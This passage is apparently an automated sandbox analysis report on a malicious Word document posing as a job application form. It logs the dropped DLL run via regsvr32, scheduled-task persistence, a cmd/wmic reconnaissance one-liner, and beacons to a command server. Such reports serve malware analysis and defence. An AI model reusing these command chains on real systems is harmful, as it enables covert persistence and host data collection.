"WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-38463179726
"WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-47149069228 - source
- API Call
- relevance
- 8/10
- ATT&CK ID
- T1120 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the registry for installed applications
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\CMD.EXE")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\CMD.EXE") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes WMI queries
-
General
-
Accesses Software Policy Settings
- details
-
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Accesses System Certificates Settings
- details
-
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\E6A3B45B062D509B3382282D196EFE97D5956CCB"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0"; Key: "BLOB")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
"msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Contacts domains
- details
-
"crt.sectigo.com"
"account.shopjobys.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"18.222.173.108:443"
"91.199.212.52:80" - source
- Network Traffic
- relevance
- 1/10
-
Creates a writable file in a temporary directory
- details
-
"wscript.exe" created file "%TEMP%\Cab4EC3.tmp"
"wscript.exe" created file "%TEMP%\Tar4EC4.tmp"
"WINWORD.EXE" created file "%TEMP%\~DFAB94EE5F1CB19B40.TMP"
"cmd.exe" created file "%TEMP%\55356.txt"
"cmd.exe" created file "%TEMP%\8785.txt"
"cmd.exe" created file "%TEMP%\23030.txt"
"cmd.exe" created file "%TEMP%\4254.txt"
"cmd.exe" created file "%TEMP%\24760.txt"
"cmd.exe" created file "%TEMP%\1931.txt"
"cmd.exe" created file "%TEMP%\16406.txt" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\_MSIExecute"
"Local\10MU_ACBPIDS_S-1-5-5-0-64883"
"Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Local\10MU_ACB10_S-1-5-5-0-64883"
"Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-64883"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-64883"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~_21152.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6AF50000
- source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Logged script engine calls
- details
-
"wscript.exe" called "WScript.Shell.1.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"msxsl.exe" called "WScript.Shell.1.CreateObject" ...
"msxsl.exe" called "WScript.Network.1.CreateObject" ...
"msxsl.exe" called "Msxml2.XMLHTTP.6.0.CreateObject" ...
"msxsl.exe" called "Msxml2.ServerXMLHTTP.6.0.CreateObject" ...
"msxsl.exe" called "Shell.Application.1.CreateObject" ... - source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"WINWORD.EXE" touched "Microsoft Word 97-2003-Dokument" (Path: "HKCU\CLSID\{00020906-0000-0000-C000-000000000046}\IMPLEMENTED CATEGORIES\{00021490-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "Shortcut" (Path: "HKCU\CLSID\{00021401-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "Computer" (Path: "HKCU\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELLFOLDER")
"WINWORD.EXE" touched "Memory Mapped Cache Mgr" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}")
"WINWORD.EXE" touched "SAX XML Reader 6.0" (Path: "HKCU\CLSID\{88D96A0C-F192-11D4-A65F-0040963251E5}\TREATAS")
"WINWORD.EXE" touched "MXXMLWriter 6.0" (Path: "HKCU\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\TREATAS")
"WINWORD.EXE" touched "OneNote Word Add-In Take Notes Content Service Class" (Path: "HKCU\CLSID\{C580A1B2-5915-4DC3-BE93-8A51F4CAB320}\INPROCSERVER32")
"WINWORD.EXE" touched "PersistentZoneIdentifier" (Path: "HKCU\CLSID\{0968E258-16C7-4DBA-AA86-462DD61E31A3}\TREATAS")
"WINWORD.EXE" touched "Security Manager" (Path: "HKCU\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TREATAS")
"WINWORD.EXE" touched "Factoid Class" (Path: "HKCU\CLSID\{16A933D2-A296-49D5-96FC-C7C2DAEE88B4}\INPROCSERVER32")
"WINWORD.EXE" touched "MetAction Class" (Path: "HKCU\CLSID\{3CC385AC-95CC-4A75-BF35-AB36AE645BCF}\INPROCSERVER32")
"WINWORD.EXE" touched "IMContactRecognizer Class" (Path: "HKCU\CLSID\{579A3C71-2339-4DEE-A735-24BF2D1C5814}\INPROCSERVER32")
"WINWORD.EXE" touched "VSTO SmartTag Action" (Path: "HKCU\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}\INPROCSERVER32")
"WINWORD.EXE" touched "SmartDocument Class" (Path: "HKCU\CLSID\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}\INPROCSERVER32")
"WINWORD.EXE" touched "Microsoft Word-Vorlage mit Makros" (Path: "HKCU\CLSID\{8A624388-AA27-43E0-89F8-2A12BFF7BCCD}\IMPLEMENTED CATEGORIES\{00021490-0000-0000-C000-000000000046}")
"WINWORD.EXE" touched "MetRecog Class" (Path: "HKCU\CLSID\{32D85DA2-070B-49A0-9261-E7854457A6D6}\INPROCSERVER32")
"WINWORD.EXE" touched "XML DOM Document 6.0" (Path: "HKCU\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\TREATAS")
"schtasks.exe" touched "TaskScheduler class" (Path: "HKCU\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}")
"msxsl.exe" touched "NetworkListManager" (Path: "HKCU\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}")
"msxsl.exe" touched "Network List Manager" (Path: "HKCU\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}") - source
- Registry Access
- relevance
- 3/10
-
Process launched with changed environment
- details
-
Process "WINWORD.EXE" (Show Process) was launched with modified environment variables: "Path"
Process "regsvr32.exe" (Show Process) was launched with modified environment variables: "Path"
Process "WMIC.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G"" - source
- Monitored Target
- relevance
- 10/10
-
Reads configuration files
- details
- "msxsl.exe" read file "%USERPROFILE%\Desktop\desktop.ini"
- source
- API Call
- relevance
- 4/10
-
Runs shell commands
- details
-
"/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL" on 2019-12-19.22:28:58.363
"/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist | findstr /R /C:"SerialNumber=" > "%TEMP%\55356.txt" & vol C: > "%TEMP%\8785.txt" & wmic csproduct get Name /FORMAT:Textvaluelist | findstr /R /C:"Name=" > "%TEMP%\23030.txt" & tasklist /FO CSV /NH > "%TEMP%\4254.txt" & ver > "%TEMP%\24760.txt" & wmic os get ProductType /FORMAT:Textvaluelist | findstr /R /C:"ProductType=" > "%TEMP%\1931.txt" & ipconfig | findstr /R /C:"IPv4 Address" > "%TEMP%\16406.txt"" on 2019-12-19.22:30:24.566 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "WINWORD.EXE" with commandline ""%APPDATA%\Microsoft\21152.doc"" (Show Process)
Spawned process "regsvr32.exe" with commandline "/s /i "%APPDATA%\Microsoft\40070.ocx"" (Show Process)
Spawned process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793"" (Show Process)
Spawned process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2F ..." (Show Process), Spawned process "msxsl.exe" with commandline "8CDAF1CED822.txt 8CDAF1CED822.txt" (Show Process), Spawned process "cmd.exe" with commandline "/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL" (Show Process), Spawned process "cmd.exe" with commandline "/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Text ..." (Show Process), Spawned process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textva ..." (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"SerialNumber="" (Show Process), Spawned process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist" (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"Name="" (Show Process), Spawned process "tasklist.exe" with commandline "tasklist /FO CSV /NH" (Show Process), Spawned process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist" (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"ProductType="" (Show Process), Spawned process "ipconfig.exe" (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"IPv4 Address"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "WINWORD.EXE" with commandline ""%APPDATA%\Microsoft\21152.doc"" (Show Process)
Spawned process "regsvr32.exe" with commandline "/s /i "%APPDATA%\Microsoft\40070.ocx"" (Show Process)
Spawned process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793"" (Show Process)
Spawned process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2F ..." (Show Process), Spawned process "msxsl.exe" with commandline "8CDAF1CED822.txt 8CDAF1CED822.txt" (Show Process), Spawned process "cmd.exe" with commandline "/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL" (Show Process), Spawned process "cmd.exe" with commandline "/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Text ..." (Show Process), Spawned process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textva ..." (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"SerialNumber="" (Show Process), Spawned process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist" (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"Name="" (Show Process), Spawned process "tasklist.exe" with commandline "tasklist /FO CSV /NH" (Show Process), Spawned process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist" (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"ProductType="" (Show Process), Spawned process "ipconfig.exe" (Show Process), Spawned process "findstr.exe" with commandline "findstr /R /C:"IPv4 Address"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Accesses Software Policy Settings
-
Installation/Persistance
-
Connects to LPC ports
- details
-
"WINWORD.EXE" connecting to "\ThemeApiPort"
"regsvr32.exe" connecting to "\ThemeApiPort"
"schtasks.exe" connecting to "\ThemeApiPort"
"msxsl.exe" connecting to "\ThemeApiPort"
"WMIC.exe" connecting to "\ThemeApiPort" - source
- API Call
- relevance
- 1/10
-
Creates new processes
- details
-
"wscript.exe" is creating a new process (Name: "%WINDIR%\System32\svchost.exe", Handle: 1320)
"wscript.exe" is creating a new process (Name: "C:\Windows\System32\regsvr32.exe", Handle: 1328)
"regsvr32.exe" is creating a new process (Name: "C:\Windows\System32\schtasks.exe", Handle: 288)
"regsvr32.exe" is creating a new process (Name: "C:\Windows\System32\schtasks.exe", Handle: 292)
"regsvr32.exe" is creating a new process (Name: "%ALLUSERSPROFILE%\Microsoft\msxsl.exe", Handle: 288)
"regsvr32.exe" is creating a new process (Name: "C:\Windows\System32\cmd.exe", Handle: 292)
"msxsl.exe" is creating a new process (Name: "%WINDIR%\System32\VBoxTray.exe", Handle: 1508)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\wbem\WMIC.exe", Handle: 92)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\wbem\WMIC.exe", Handle: 80)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 100)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 108)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 84)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\tasklist.exe", Handle: 88)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\findstr.exe", Handle: 116)
"cmd.exe" is creating a new process (Name: "C:\Windows\System32\ipconfig.exe", Handle: 108) - source
- API Call
- relevance
- 8/10
-
Dropped files
- details
-
"21152.doc" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Title: Internal Job Application Form Author: gwen rogers Template: Normal Last Saved By: Pam Byrd Revision Number: 2 Name of Creating Application: Microsoft Office Word Last Printed: Fri Feb 24 18:58:00 2012 Create Time/Date: Tue Nov 3 20:35:00 2015 Last Saved Time/Date: Tue Nov 3 20:35:00 2015 Number of Pages: 1 Number of Words: 305 Number of Characters: 1744 Security: 0"
"21152.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Dec 19 21:18:39 2019 mtime=Thu Dec 19 21:18:39 2019 atime=Thu Dec 19 21:18:39 2019 length=65536 window=hide"
"~_21152.doc" has type "data"
"~WRS_8B17FE91-C013-4377-BC8D-FDE8AB008397_.tmp" has type "data"
"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"
"index.dat" has type "data"
"Tar4EC4.tmp" has type "data"
"5BBDA94EA59A54780CD5101BF0AF1837_75B55D50AC5471AEF49255E8D11DE15B" has type "data"
"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 6894 bytes 1 file"
"4254.txt" has type "ASCII text with CRLF line terminators"
"24760.txt" has type "ASCII text with CRLF line terminators"
"Cab4EC3.tmp" has type "Microsoft Cabinet archive data 58806 bytes 1 file"
"07CEF2F654E3ED6050FFC9B6EB844250_426BFAC057FA3BC8F7120A426363018F" has type "data"
"55356.txt" has type "ASCII text with CRLF CR line terminators"
"40070.ocx" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"8785.txt" has type "ASCII text with CRLF line terminators"
"16406.txt" has type "ASCII text with CRLF line terminators"
"23030.txt" has type "ASCII text with CRLF CR line terminators"
"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 58806 bytes 1 file" - source
- Binary File
- relevance
- 3/10
-
Drops executable files
- details
- "40070.ocx" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
"wscript.exe" touched file "C:\Windows\System32\en-US\wscript.exe.mui"
"wscript.exe" touched file "C:\Windows\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\en-US\winhttp.dll.mui"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"wscript.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"wscript.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000020.db"
"wscript.exe" touched file "C:\Windows\System32\en-US\jscript.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\tzres.dll"
"wscript.exe" touched file "C:\Windows\AppPatch\sysmain.sdb"
"wscript.exe" touched file "C:\Windows\System32"
"wscript.exe" touched file "C:\Windows\System32\regsvr32.exe"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches" - source
- API Call
- relevance
- 7/10
-
Connects to LPC ports
-
Network Related
-
Found potential IP address in binary/memory
- details
-
Heuristic match: "IPv4 Address. . . . . . . . . . . : 192.168.240.18"
Heuristic match: "Subnet Mask . . . . . . . . . . . : 255.255.255.0"
Heuristic match: "Default Gateway . . . . . . . . . : 192.168.240.1" - source
- File/Memory
- relevance
- 3/10
-
Found potential URL in binary/memory
- details
-
Heuristic match: "crt.sectigo.com"
Heuristic match: "GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crt.sectigo.com"
Heuristic match: "account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 36
Host: account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 146
Host: account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 153
Host: account.shopjobys.com"
Heuristic match: "POST /av4598yh001/info HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 144
Host: account.shopjobys.com"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.w3.org/1999/XSL/Transform"
Pattern match: "http://schemas.microsoft.com/windows/2004/02/mit/task"
Pattern match: "http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt" - source
- File/Memory
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
Remote Access Related
-
Contains references to WMI/WMIC
- details
-
""WmiPrvSE.exe","2704","Services","0","4
956 K"" (Indicator: "wmiprvse.exe")
""WmiPrvSE.exe","3220","Services","0","9
972 K"" (Indicator: "wmiprvse.exe")
"WMIC.exe" (Indicator: "wmic.exe")
"WmiPrvSE.exe" (Indicator: "wmiprvse.exe") - source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1047 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads terminal service related keys (often RDP related)
- details
- "msxsl.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1076 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains references to WMI/WMIC
-
System Security
-
Creates or modifies windows services
- details
- "msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies Software Policy Settings
- details
-
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
"msxsl.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies proxy settings
- details
-
